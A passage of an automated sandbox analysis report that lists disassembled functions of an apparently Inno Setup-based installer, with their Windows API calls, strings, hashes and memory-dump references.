                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041CBEE
                                                                                                                            • DeleteDC.GDI32(00000000), ref: 0041CC04
                                                                                                                              • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 269503290-0
                                                                                                                            • Opcode ID: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                                                            • Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
                                                                                                                            • Opcode Fuzzy Hash: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                                                            • Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00456638 Relevance: 26.6, APIs: 4, Strings: 11, Instructions: 310COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • 76CCE550.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
                                                                                                                            • 76CCE550.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0045685B
                                                                                                                            Strings
                                                                                                                            • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
                                                                                                                            • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
                                                                                                                            • %ProgramFiles(x86)%\, xrefs: 0045672E
                                                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
                                                                                                                            • IPersistFile::Save, xrefs: 00456962
                                                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
                                                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
                                                                                                                            • CoCreateInstance, xrefs: 004566AF
                                                                                                                            • {pf32}\, xrefs: 0045671E
                                                                                                                            • IPropertyStore::Commit, xrefs: 004568E3
                                                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: E550$FreeString
                                                                                                                            • String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
                                                                                                                            • API String ID: 491012016-2363233914
                                                                                                                            • Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                                                            • Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
                                                                                                                            • Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                                                            • Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004983D0 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 251synchronizationCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
                                                                                                                            • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
                                                                                                                            • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
                                                                                                                              • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                                                            • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                                                            • API String ID: 2000705611-3672972446
                                                                                                                            • Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                                                            • Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
                                                                                                                            • Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                                                            • Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0045A6D8 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 209COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(00000000,0045A994,?,?,?,?,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 0045A846
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                                                            • API String ID: 1452528299-3112430753
                                                                                                                            • Opcode ID: b969254c7af52069d00d450bc25108601270d2f9398ad690918fa25cf6f4b58e
                                                                                                                            • Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
                                                                                                                            • Opcode Fuzzy Hash: b969254c7af52069d00d450bc25108601270d2f9398ad690918fa25cf6f4b58e
                                                                                                                            • Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0045CBC0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 182libraryloadermemoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetVersion.KERNEL32 ref: 0045CBDA
                                                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
                                                                                                                              • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                                                            • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                                                            • API String ID: 59345061-4263478283
                                                                                                                            • Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                                                            • Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
                                                                                                                            • Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                                                            • Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041B3AC Relevance: 21.1, APIs: 14, Instructions: 126windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                                                                                            • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                                                                                            • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                                                                                            • GetDC.USER32(00000000), ref: 0041B402
                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                                                            • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                                                            • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 644427674-0
                                                                                                                            • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                                                            • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
                                                                                                                            • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                                                            • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00472B48 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 337COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
                                                                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
                                                                                                                            • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
                                                                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                                                            • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                                                            • API String ID: 971782779-3668018701
                                                                                                                            • Opcode ID: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                                                            • Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
                                                                                                                            • Opcode Fuzzy Hash: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                                                            • Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00454874 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                            • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                                                                              • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                                            • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                                                                                            • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                                                                                            Strings
                                                                                                                            • RegOpenKeyEx, xrefs: 00454910
                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                                                                                            • , xrefs: 004548FE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: QueryValue$FormatMessageOpen
                                                                                                                            • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                                            • API String ID: 2812809588-1577016196
                                                                                                                            • Opcode ID: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                                                            • Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
                                                                                                                            • Opcode Fuzzy Hash: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                                                            • Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00459458 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 165registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
                                                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
                                                                                                                            Strings
                                                                                                                            • v1.1.4322, xrefs: 004595C2
                                                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
                                                                                                                            • v4.0.30319, xrefs: 004594F1
                                                                                                                            • v2.0.50727, xrefs: 0045955B
                                                                                                                            • .NET Framework version %s not found, xrefs: 00459609
                                                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
                                                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
                                                                                                                            • .NET Framework not found, xrefs: 0045961D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$Open
                                                                                                                            • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                                                            • API String ID: 2976201327-446240816
                                                                                                                            • Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                                                            • Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
                                                                                                                            • Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                                                            • Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00458A44 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00458A7B
                                                                                                                            • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
                                                                                                                            • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
                                                                                                                            • GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
                                                                                                                            • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
                                                                                                                            Strings
                                                                                                                            • Helper process exited, but failed to get exit code., xrefs: 00458AEF
                                                                                                                            • Helper process exited with failure code: 0x%x, xrefs: 00458AE3
                                                                                                                            • Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
                                                                                                                            • Helper isn't responding; killing it., xrefs: 00458A87
                                                                                                                            • Helper process exited., xrefs: 00458AC5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                                                            • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                                                            • API String ID: 3355656108-1243109208
                                                                                                                            • Opcode ID: 8d11a9d6b8ebfffa9e94c3bd241da5180e5b7166b03f76cd8ec90a905d120898
                                                                                                                            • Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
                                                                                                                            • Opcode Fuzzy Hash: 8d11a9d6b8ebfffa9e94c3bd241da5180e5b7166b03f76cd8ec90a905d120898
                                                                                                                            • Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00454528 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
